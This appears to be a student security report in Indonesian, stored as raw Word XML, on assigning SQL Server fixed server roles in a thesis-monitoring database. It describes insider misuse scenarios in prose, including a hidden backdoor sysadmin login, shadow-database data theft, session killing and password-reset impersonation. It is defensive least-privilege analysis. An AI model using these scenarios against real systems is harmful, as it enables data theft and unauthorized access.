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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">LAPORAN ANALISIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Fixed Server Roles – SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistem Monitoring Tugas Akhir | D_Monitoring_TA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Soal 8 – Bagian D: Keamanan 1 (Autentikasi &amp; Server Roles)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5090" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="180"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Pendahuluan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fixed Server Roles adalah peran keamanan bawaan SQL Server yang bekerja di tingkat instance (server level). Setiap role memiliki sekumpulan hak akses yang sudah ditentukan dan tidak dapat diubah. Pemberian role yang tepat sangat penting untuk menjaga keamanan sistem, mencegah penyalahgunaan, dan memastikan setiap pengguna hanya memiliki akses sesuai tanggung jawabnya (prinsip least privilege).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dalam sistem D_Monitoring_TA, terdapat lima jenis pengguna yang memerlukan tingkat akses berbeda-beda, yaitu: Administrator, Operator, Staf Input Data, Auditor, dan Developer. Dokumen ini menjabarkan fixed server role yang diberikan kepada masing-masing pengguna beserta alasan, risiko, dan skenario penyalahgunaan yang mungkin terjadi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ringkasan Mapping Fixed Server Role</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="34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Pengguna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Fixed Server Role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Hak Utama</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 Utama</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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Administrator</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sysadmin</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Akses penuh instance SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Penghapusan seluruh database, pembuatan backdoor login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Operator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dbcreator + bulkadmin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Buat/restore DB, impor data massal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Database bayangan, manipulasi data impor</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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Staf Input Data</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(Tidak ada — DB level)</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Hanya akses tabel tertentu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Tidak relevan di server level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Auditor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Kelola login, verifikasi keamanan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Reset password akun lain, penyamaran identitas</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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Developer</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setupadmin</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Kelola linked server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Eksfiltrasi data via linked server luar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Catatan: Staf Input Data tidak mendapatkan fixed server role karena seluruh hak aksesnya dikelola di tingkat database (database-level roles dan GRANT/DENY).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Analisis Detail Per Pengguna</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Administrator — sysadmin</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="6826"/>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Fixed Server Role</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sysadmin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Deskripsi Role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Memberikan akses penuh dan tidak terbatas ke seluruh instance SQL Server.</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Login SQL Server</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LoginAdmin (dibuat dengan SQL Server Authentication)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Alasan Pemberian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 bertanggung jawab atas konfigurasi server, pengelolaan semua login, backup &amp; restore database, monitoring performa, serta pemeliharaan instance SQL Server secara keseluruhan. sysadmin adalah satu-satunya role yang memberikan cakupan penuh yang diperlukan untuk tugas-tugas tersebut.</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Hak Akses Utama</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Membuat, mengubah, dan menghapus semua database; mengelola semua login; menjalankan semua perintah T-SQL; mengakses semua data tanpa pembatasan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risiko Jika Role Diberikan Terlalu Tinggi (atau ke orang yang salah):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Penghapusan seluruh database produksi secara permanen (DROP DATABASE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pembuatan login backdoor tersembunyi dengan hak sysadmin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ekspor seluruh data sensitif mahasiswa, dosen, dan nilai ke pihak luar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Memodifikasi atau menghapus log audit sehingga aktivitas berbahaya tidak terlacak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="E0A000" w:sz="4"/>
          <w:bottom w:val="single" w:color="E0A000" w:sz="4"/>
          <w:left w:val="single" w:color="E0A000" w:sz="12"/>
          <w:right w:val="single" w:color="E0A000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFF2CC" w:val="clear"/>
        <w:spacing w:after="0" w:before="100"/>
        <w:ind w:left="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B4A00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ Skenario Penyalahgunaan: Backdoor Login oleh Administrator Nakal</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Seorang administrator yang hendak resign secara diam-diam membuat login baru</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dengan hak sysadmin menggunakan nama yang menyerupai akun sistem (misal: 'sa_backup').</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Setelah keluar dari perusahaan, ia menggunakan login tersebut untuk masuk kembali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ke sistem, mengekspor data seluruh mahasiswa, lalu menghapus database produksi.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Karena ia dulu adalah admin, tidak ada pembatasan teknis yang mencegahnya.</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090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Operator — dbcreator + bulkadmin</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="6826"/>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Fixed Server Role</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dbcreator  +  bulkadmin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Login SQL Server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LoginOperator (SQL Server Authentication)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Alasan dbcreator</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Operator bertugas membuat database baru saat ada kebutuhan sistem, melakukan restore database dari backup untuk keperluan operasional, serta mengelola struktur database tanpa perlu akses penuh ke server.</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Alasan bulkadmin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juga bertanggung jawab mengimpor data massal (BULK INSERT) dari file eksternal, misalnya data mahasiswa baru dari sistem akademik pusat kampus, atau data nilai dari file CSV.</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Hak Akses Utama</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Membuat dan merestore database; menjalankan perintah BULK INSERT dan OPENROWSET (BULK...).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risiko Jika Role Diberikan Terlalu Tinggi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Operator dapat membuat database tidak resmi (shadow database) untuk menyimpan salinan data secara ilegal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BULK INSERT dapat disalahgunakan untuk mengimpor data palsu atau memanipulasi data mahasiswa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restore database dari file yang tidak terotorisasi dapat menimpa data produksi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="E0A000" w:sz="4"/>
          <w:bottom w:val="single" w:color="E0A000" w:sz="4"/>
          <w:left w:val="single" w:color="E0A000" w:sz="12"/>
          <w:right w:val="single" w:color="E0A000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFF2CC" w:val="clear"/>
        <w:spacing w:after="0" w:before="100"/>
        <w:ind w:left="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B4A00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ Skenario Penyalahgunaan: Shadow Database oleh Operator</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Seorang operator membuat database baru bernama 'DB_Backup_Private' menggunakan hak dbcreator.</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Ia kemudian menggunakan BULK INSERT untuk menyalin data tabel Mahasiswa dan Pengajuan_Pendadaran</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ke dalam database tersebut secara berkala. Data ini kemudian diekspor ke file lokal dan dijual</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kepada pihak ketiga yang berkepentingan (misalnya lembaga bimbingan belajar atau kompetitor).</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Aktivitas ini sulit terdeteksi karena operator memiliki izin resmi untuk operasi-operasi tersebut.</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090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Staf Input Data — (Tidak Ada Fixed Server Role)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="6826"/>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Fixed Server Role</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(Tidak diberikan — dikelola di database level)</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Login SQL Server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LoginStaf (SQL Server Authentication)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Alasan Tidak Diberi Fixed Server Role</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Staf input data hanya perlu mengakses tabel-tabel tertentu dalam satu database (D_Monitoring_TA). Fixed server role bekerja di level instance dan memberikan hak terlalu luas. Akses staf akan dikonfigurasi melalui database user mapping, database roles, dan GRANT/DENY di level tabel (diatur pada Soal 9 dan 10).</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Hak Akses yang Direncanakan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INSERT, UPDATE pada tabel spesifik seperti Log_Bimbingan dan Pengajuan_Pendadaran saja.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risiko Jika Diberi Fixed Server Role (Contoh: processadmin):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">processadmin mengizinkan penggunaan perintah KILL untuk menghentikan sesi pengguna lain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Staf dapat mematikan koneksi dosen, mahasiswa, atau admin secara sengaja.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gangguan operasional dapat terjadi di saat kritis, misalnya ketika sidang pendadaran berlangsung.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="E0A000" w:sz="4"/>
          <w:bottom w:val="single" w:color="E0A000" w:sz="4"/>
          <w:left w:val="single" w:color="E0A000" w:sz="12"/>
          <w:right w:val="single" w:color="E0A000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFF2CC" w:val="clear"/>
        <w:spacing w:after="0" w:before="100"/>
        <w:ind w:left="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B4A00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ Skenario Penyalahgunaan: Gangguan Sesi oleh Staf Tidak Puas</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Staf administrasi yang tidak puas karena evaluasi kinerja buruk mendapatkan hak processadmin.</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Pada hari sidang pendadaran berlangsung, ia menjalankan perintah KILL terhadap session ID</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milik dosen penguji yang sedang mengakses sistem untuk menginput nilai.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Akibatnya, dosen tidak dapat login kembali selama beberapa menit, menyebabkan</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penundaan proses sidang dan kerugian operasional bagi institusi.</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090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Auditor — securityadmin</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="6826"/>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Fixed Server Role</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securityadmin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Login SQL Server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LoginAuditor (SQL Server Authentication)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Alasan Pemberian</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Auditor perlu memverifikasi konfigurasi keamanan server: siapa saja yang memiliki login, kebijakan password apa yang diterapkan, dan apakah ada login yang dinonaktifkan atau dikonfigurasi tidak benar. securityadmin mengizinkan pembacaan dan pengelolaan login untuk keperluan audit.</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Hak Akses Utama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Melihat semua login; mengelola konfigurasi login; memberikan akses ke database (GRANT); me-reset password login (kecuali sysadmin).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Catatan Penting</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Secara ideal, auditor hanya memerlukan hak READ terhadap sys.server_principals dan sys.server_role_members. Di lingkungan produksi nyata, disarankan membuat custom server role atau menggunakan VIEW SERVER STATE daripada securityadmin penuh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="320"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risiko Jika Role Diberikan Terlalu Tinggi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">securityadmin dapat mereset password login lain, termasuk dosen dan operator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditor bisa login sebagai pengguna lain setelah mereset passwordnya, menyamar sebagai pengguna tersebut.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
